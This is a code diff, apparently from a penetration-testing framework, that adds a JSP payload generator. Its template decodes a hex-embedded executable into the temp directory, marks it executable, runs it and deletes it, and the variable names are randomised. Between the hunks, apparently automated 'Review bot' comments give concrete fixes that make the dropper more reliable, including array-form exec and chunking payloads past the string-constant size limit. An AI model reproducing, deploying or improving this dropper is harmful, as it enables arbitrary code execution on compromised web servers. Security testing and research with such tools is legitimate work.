Land #7283, add jsp payload generator
commit
4c4f2e45d6
|
@ -0,0 +1,38 @@
|
|||
<%%@ page import="java.io.*" %%>
|
||||
<%%
|
||||
String %{var_payload} = "%{payload}";
|
||||
String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
|
||||
|
||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {
|
||||
%{var_exepath} = %{var_exepath}.concat(".exe");
|
||||
}
|
||||
|
||||
int %{var_payloadlength} = %{var_payload}.length();
|
||||
byte[] %{var_bytes} = new byte[%{var_payloadlength}/2];
|
||||
for (int %{var_counter} = 0; %{var_counter} < %{var_payloadlength}; %{var_counter} += 2) {
|
||||
%{var_bytes}[%{var_counter} / 2] = (byte) ((Character.digit(%{var_payload}.charAt(%{var_counter}), 16) << 4)
|
||||
+ Character.digit(%{var_payload}.charAt(%{var_counter}+1), 16));
|
||||
}
|
||||
|
||||
FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
|
||||
%{var_outputstream}.write(%{var_bytes});
|
||||
%{var_outputstream}.flush();
|
||||
%{var_outputstream}.close();
|
||||
|
||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
|
||||
String[] %{var_fperm} = new String[3];
|
||||
%{var_fperm}[0] = "chmod";
|
||||
%{var_fperm}[1] = "+x";
|
||||
%{var_fperm}[2] = %{var_exepath};
|
||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
|
||||
if (%{var_proc}.waitFor() == 0) {
|
||||
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
|
||||
}
|
||||
|
||||
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
|
||||
} else {
|
||||
String[] %{var_exepatharray} = new String[1];
|
||||
%{var_exepatharray}[0] = %{var_exepath};
|
||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
|
||||
}
|
||||
%%>
|
|
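Review bot: The non-Windows launch on the `%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});` line after the chmod passes the path as a single String, which Java tokenizes on whitespace, so a `java.io.tmpdir` containing a space splits the command and the dropped binary never runs; the Windows branch below already avoids this by passing a String[]. Use the array form in both branches: `%{var_proc} = Runtime.getRuntime().exec(new String[] { %{var_exepath} });`. The FileOutputStream is also never closed if write() throws, so a failed write leaves a half-written file in the temp directory; wrapping the write/flush/close in try/finally (or closing in a finally and deleting on failure) would avoid that artifact. A non-zero chmod exit is silently tolerated and the file is deleted anyway, which is probably intended for a payload but deserves a one-line comment saying so.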
@ -1,51 +0,0 @@
|
|||
<%%@ page import="java.io.*" %%>
|
||||
<%%
|
||||
String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
|
||||
String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
|
||||
String %{var_data} = "";
|
||||
|
||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
|
||||
{
|
||||
%{var_exepath} = %{var_exepath}.concat(".exe");
|
||||
}
|
||||
|
||||
FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
|
||||
FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
|
||||
|
||||
int %{var_numbytes} = %{var_inputstream}.available();
|
||||
byte %{var_bytearray}[] = new byte[%{var_numbytes}];
|
||||
%{var_inputstream}.read(%{var_bytearray});
|
||||
%{var_inputstream}.close();
|
||||
byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
|
||||
for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
|
||||
{
|
||||
char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
|
||||
char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
|
||||
int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
|
||||
%{var_comb} <<= 4;
|
||||
%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
|
||||
%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
|
||||
}
|
||||
|
||||
%{var_outputstream}.write(%{var_bytes});
|
||||
%{var_outputstream}.close();
|
||||
|
||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
|
||||
String[] %{var_fperm} = new String[3];
|
||||
%{var_fperm}[0] = "chmod";
|
||||
%{var_fperm}[1] = "+x";
|
||||
%{var_fperm}[2] = %{var_exepath};
|
||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
|
||||
if (%{var_proc}.waitFor() == 0) {
|
||||
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
|
||||
}
|
||||
|
||||
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
|
||||
}
|
||||
else
|
||||
{
|
||||
String[] %{var_exepatharray} = new String[1];
|
||||
%{var_exepatharray}[0] = %{var_exepath};
|
||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
|
||||
}
|
||||
%%>
|
|
@ -1407,6 +1407,40 @@ require 'msf/core/exe/segment_appender'
|
|||
read_replace_script_template("to_powershell.hta.template", hash_sub)
|
||||
end
|
||||
|
||||
def self.to_jsp(exe)
|
||||
hash_sub = {}
|
||||
hash_sub[:var_payload] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_exepath] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_outputstream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_payloadlength] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_counter] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_exe] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
|
||||
payload_hex = exe.unpack('H*')[0]
|
||||
hash_sub[:payload] = payload_hex
|
||||
|
||||
read_replace_script_template("to_exe.jsp.template", hash_sub)
|
||||
end
|
||||
|
||||
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a
|
||||
# payload. The jsp page converts the hexdump back to a normal binary file
|
||||
# and places it in the temp directory. The payload file is then executed.
|
||||
#
|
||||
# @see to_war
|
||||
# @param exe [String] Executable to drop and run.
|
||||
# @param opts (see to_war)
|
||||
# @option opts (see to_war)
|
||||
# @return (see to_war)
|
||||
def self.to_jsp_war(exe, opts = {})
|
||||
template = self.to_jsp(exe)
|
||||
self.to_war(template, opts)
|
||||
end
|
||||
|
||||
def self.to_win32pe_vbs(framework, code, opts = {})
|
||||
to_exe_vbs(to_win32pe(framework, code, opts), opts)
|
||||
end
|
||||
|
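Review bot: `to_jsp` embeds the entire hex dump as one Java string literal (`hash_sub[:payload] = payload_hex` feeding `String %{var_payload} = "%{payload}"` in the template), and the JVM class-file format caps a single string constant at 65535 UTF-8 bytes, so any executable over roughly 32 KB may fail to compile on the target container with a "constant string too long" error — a limit the extra-file approach this commit removes did not have; I cannot see the default exe template size here, but typical Windows payload executables are well above that. Splitting `payload_hex` into chunks and having the template append them to a StringBuilder would keep large payloads deployable (concatenating literals does not help, since the compiler constant-folds them back into one string). Separately, the moved YARD comment on `to_jsp_war` still describes a WAR "containing a jsp page and hexdump of a payload" as if the hexdump were a separate file; now it is inlined, so it should read `# Creates a Web Archive (WAR) file containing a jsp page with the payload embedded as a hex string; the page decodes it into the temp directory and executes it.`, and `to_jsp` itself has no documentation — a matching `# @param exe [String] Executable to drop and run.` / `# @return [String] JSP source that drops and runs exe.` header would bring it in line with the rest of the file.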
@ -1500,52 +1534,6 @@ require 'msf/core/exe/segment_appender'
|
|||
zip.pack
|
||||
end
|
||||
|
||||
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a
|
||||
# payload. The jsp page converts the hexdump back to a normal binary file
|
||||
# and places it in the temp directory. The payload file is then executed.
|
||||
#
|
||||
# @see to_war
|
||||
# @param exe [String] Executable to drop and run.
|
||||
# @param opts (see to_war)
|
||||
# @option opts (see to_war)
|
||||
# @return (see to_war)
|
||||
def self.to_jsp_war(exe, opts = {})
|
||||
# begin <payload>.jsp
|
||||
hash_sub = {}
|
||||
hash_sub[:var_hexpath] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_exepath] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_data] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_inputstream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_outputstream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_numbytes] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_bytearray] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_counter] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_char1] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_char2] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_comb] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_exe] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_hexfile] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
|
||||
# Specify the payload in hex as an extra file..
|
||||
payload_hex = exe.unpack('H*')[0]
|
||||
opts.merge!(
|
||||
{
|
||||
:extra_files =>
|
||||
[
|
||||
[ "#{hash_sub[:var_hexfile]}.txt", payload_hex ]
|
||||
]
|
||||
})
|
||||
|
||||
template = read_replace_script_template("to_exe_jsp.war.template", hash_sub)
|
||||
|
||||
self.to_war(template, opts)
|
||||
end
|
||||
|
||||
# Creates a .NET DLL which loads data into memory
|
||||
# at a specified location with read/execute permissions
|
||||
# - the data will be loaded at: base+0x2065
|
||||
|
@ -2221,6 +2209,12 @@ require 'msf/core/exe/segment_appender'
|
|||
when 'loop-vbs'
|
||||
exe = exe = to_executable_fmt(framework, arch, plat, code, 'exe-small', exeopts)
|
||||
Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => true }))
|
||||
when 'jsp'
|
||||
arch ||= [ ARCH_X86 ]
|
||||
tmp_plat = plat.platforms if plat
|
||||
tmp_plat ||= Msf::Module::PlatformList.transform('win')
|
||||
exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, code, exeopts)
|
||||
Msf::Util::EXE.to_jsp(exe)
|
||||
when 'war'
|
||||
arch ||= [ ARCH_X86 ]
|
||||
tmp_plat = plat.platforms if plat
|
||||
|
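Review bot: The new `'jsp'` branch repeats the three arch/platform defaulting lines (`arch ||= [ ARCH_X86 ]`, `tmp_plat = plat.platforms if plat`, `tmp_plat ||= Msf::Module::PlatformList.transform('win')`) that open the `'war'` branch immediately below it; factoring them into a small private helper shared by both formats would keep the two from drifting apart. It also hands the result of `to_executable` straight to `to_jsp`, which calls `exe.unpack` — if `to_executable` returns nil for an unsupported arch/platform combination (its body is not visible here), that surfaces as a NoMethodError rather than a clear message, so a guard such as `raise ArgumentError, 'no executable for the requested arch/platform' unless exe` before the `to_jsp` call would help. The enclosing case statement starts and ends outside this hunk.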
@ -2258,6 +2252,7 @@ require 'msf/core/exe/segment_appender'
|
|||
"exe-small",
|
||||
"hta-psh",
|
||||
"jar",
|
||||
"jsp",
|
||||
"loop-vbs",
|
||||
"macho",
|
||||
"msi",
|
||||
|
|